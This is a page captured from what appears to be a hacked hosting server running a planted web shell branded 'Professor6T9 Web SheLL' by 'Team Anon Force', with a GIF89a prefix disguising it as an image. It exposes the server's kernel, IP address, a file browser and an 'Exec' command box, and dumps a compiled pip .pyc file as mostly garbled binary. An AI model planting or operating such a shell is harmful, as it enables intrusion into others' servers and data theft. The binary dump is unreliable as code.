GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
distributions
/
__pycache__
[ HOME ]
Exec
Submit
File Name : wheel.cpython-311.pyc
� L�iT � �v � d dl mZ d dlmZ d dlmZ d dlmZ d dlm Z m Z mZ erd dlm Z G d� de� � Zd S ) � )�annotations)� TYPE_CHECKING)�canonicalize_name)�AbstractDistribution)�BaseDistribution�FilesystemWheel�get_wheel_distribution)�BuildEnvironmentInstallerc �: � e Zd ZdZedd�� � Zdd�Zdd �ZdS )�WheelDistributionzqRepresents a wheel distribution. This does not need any preparation as wheels can be directly unpacked. �return� str | Nonec � � d S �N� )�selfs ��/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/distributions/wheel.py�build_tracker_idz"WheelDistribution.build_tracker_id s � ��t� r c �� � | j j s J d� � �| j j s J d� � �t | j j � � }t |t | j j � � � � S )z�Loads the metadata from the wheel file into memory and returns a Distribution that uses it, not relying on the wheel file or requirement. z*Set as part of preparation during downloadzWheels are never unnamed)�req�local_file_path�namer r r )r �wheels r �get_metadata_distributionz+WheelDistribution.get_metadata_distribution se � � �x�'�U�U�)U�U�U�'��x�}�8�8�8�8�8�}���� 8�9�9��%�e�->�t�x�}�-M�-M�N�N�Nr �build_env_installerr �build_isolation�bool�check_build_deps�Nonec � � d S r r )r r r r s r �prepare_distribution_metadataz/WheelDistribution.prepare_distribution_metadata&